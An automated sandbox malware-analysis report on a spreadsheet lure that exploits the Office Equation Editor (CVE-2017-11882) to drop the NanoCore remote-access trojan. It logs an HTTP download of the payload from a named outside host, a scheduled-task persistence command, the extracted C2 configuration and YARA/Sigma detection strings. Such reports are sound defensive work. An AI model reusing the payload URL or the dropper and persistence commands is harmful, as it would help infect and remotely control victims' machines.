Loading ...

Play interactive tourEdit tour

Analysis Report PO-FRE590164.xlsx

Overview

General Information

Sample Name:PO-FRE590164.xlsx
Analysis ID:344209
MD5:c175f48a4862c49ec69263b5df33a71f
SHA1:e6c98cffb65b0ef3e59020b4f094e0c5123d7f5b
SHA256:42a85a33d440c195bbe8890b74fa396875a33fd6354a4b2c7ca6dfb9516c6e6e
Tags:NanoCoreVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM_3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1476 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2552 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 81956BB4F67D790E13CFD18F4CDD779B)
      • schtasks.exe (PID: 2924 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 2908 cmdline: C:\Users\Public\vbc.exe MD5: 81956BB4F67D790E13CFD18F4CDD779B)
      • vbc.exe (PID: 2920 cmdline: C:\Users\Public\vbc.exe MD5: 81956BB4F67D790E13CFD18F4CDD779B)
  • smtpsvc.exe (PID: 2264 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 81956BB4F67D790E13CFD18F4CDD779B)
    • schtasks.exe (PID: 852 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • smtpsvc.exe (PID: 1336 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 81956BB4F67D790E13CFD18F4CDD779B)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["127.0.0.1:4009"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x42aad:$a: NanoCore
      • 0x42b06:$a: NanoCore
      • 0x42b43:$a: NanoCore
      • 0x42bbc:$a: NanoCore
      • 0x56267:$a: NanoCore
      • 0x5627c:$a: NanoCore
      • 0x562b1:$a: NanoCore
      • 0x6ed13:$a: NanoCore
      • 0x6ed28:$a: NanoCore
      • 0x6ed5d:$a: NanoCore
      • 0x42b0f:$b: ClientPlugin
      • 0x42b4c:$b: ClientPlugin
      • 0x4344a:$b: ClientPlugin
      • 0x43457:$b: ClientPlugin
      • 0x56023:$b: ClientPlugin
      • 0x5603e:$b: ClientPlugin
      • 0x5606e:$b: ClientPlugin
      • 0x56285:$b: ClientPlugin
      • 0x562ba:$b: ClientPlugin
      • 0x6eacf:$b: ClientPlugin
      • 0x6eaea:$b: ClientPlugin
      Click to see the 43 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.vbc.exe.520000.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      8.2.vbc.exe.520000.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      8.2.vbc.exe.530000.3.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xd9ad:$x1: NanoCore.ClientPluginHost
      • 0xd9da:$x2: IClientNetworkHost
      8.2.vbc.exe.530000.3.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xd9ad:$x2: NanoCore.ClientPluginHost
      • 0xea88:$s4: PipeCreated
      • 0xd9c7:$s5: IClientLoggingHost
      8.2.vbc.exe.530000.3.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 11 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2552, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.207.63, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\Public\vbc.exe, ProcessId: 2920, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2688, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp', ProcessId: 2924
        Sigma detected: Executables Started in Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2552, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688
        Sigma detected: Execution in Non-Executable FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2552, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688
        Sigma detected: Suspicious Program Location Process StartsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2552, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: vbc.exe.2920.8.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["127.0.0.1:4009"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeVirustotal: Detection: 35%Perma Link
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeReversingLabs: Detection: 26%
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exeVirustotal: Detection: 35%Perma Link
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exeReversingLabs: Detection: 26%
        Source: C:\Users\user\AppData\Roaming\TrXHdHpWh.exeVirustotal: Detection: 35%Perma Link
        Source: C:\Users\user\AppData\Roaming\TrXHdHpWh.exeReversingLabs: Detection: 26%
        Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 26%
        Multi AV Scanner detection for submitted fileShow sources
        Source: PO-FRE590164.xlsxVirustotal: Detection: 34%Perma Link
        Source: PO-FRE590164.xlsxReversingLabs: Detection: 23%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\TrXHdHpWh.exeJoe Sandbox ML: detected
        Source: 8.2.vbc.exe.530000.3.unpackAvira: Label: TR/NanoCore.fadte
        Source: 8.2.vbc.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 12.2.smtpsvc.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

        Compliance:

        barindex
        Uses new MSVCR DllsShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: global trafficDNS query: name: nop.myq-see.com
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.207.63:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.207.63:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorIPs: 127.0.0.1:4009
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Jan 2021 08:22:02 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Mon, 25 Jan 2021 11:20:36 GMTETag: "bee00-5b9b7ba28300e"Accept-Ranges: bytesContent-Length: 781824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 84 a9 0e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 54 0a 00 00 98 01 00 00 00 00 00 be 72 0a 00 00 20 00 00 00 80 0a 00 00 00 00 11 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 72 0a 00 4f 00 00 00 00 80 0a 00 50 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 52 0a 00 00 20 00 00 00 54 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 95 01 00 00 80 0a 00 00 96 01 00 00 56 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 ec 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 72 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 ec 00 00 64 ab 00 00 03 00 00 00 16 00 00 06 44 98 01 00 28 da 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1c 00 00 0a 2a 26 00 02 28 1d 00 00 0a 00 2a ce 73 1e 00 00 0a 80 01 00 00 04 73 1f 00 00 0a 80 02 00 00 04 73 20 00 00 0a 80 03 00 00 04 73 21 00 00 0a 80 04 00 00 04 73 22 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 23 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 26 00 02 28 28 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a
        Source: global trafficHTTP traffic detected: GET /win/Vbb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nop.myq-see.comConnection: Keep-Alive
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F36B41B0.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /win/Vbb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nop.myq-see.comConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: nop.myq-see.com
        Source: vbc.exe, 00000004.00000002.2175017889.0000000005150000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2382084526.0000000005280000.00000002.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2208244482.0000000005290000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: vbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: vbc.exe, 00000004.00000002.2175017889.0000000005150000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2382084526.0000000005280000.00000002.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2208244482.0000000005290000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: F36B41B0.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
        Source: vbc.exe, 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
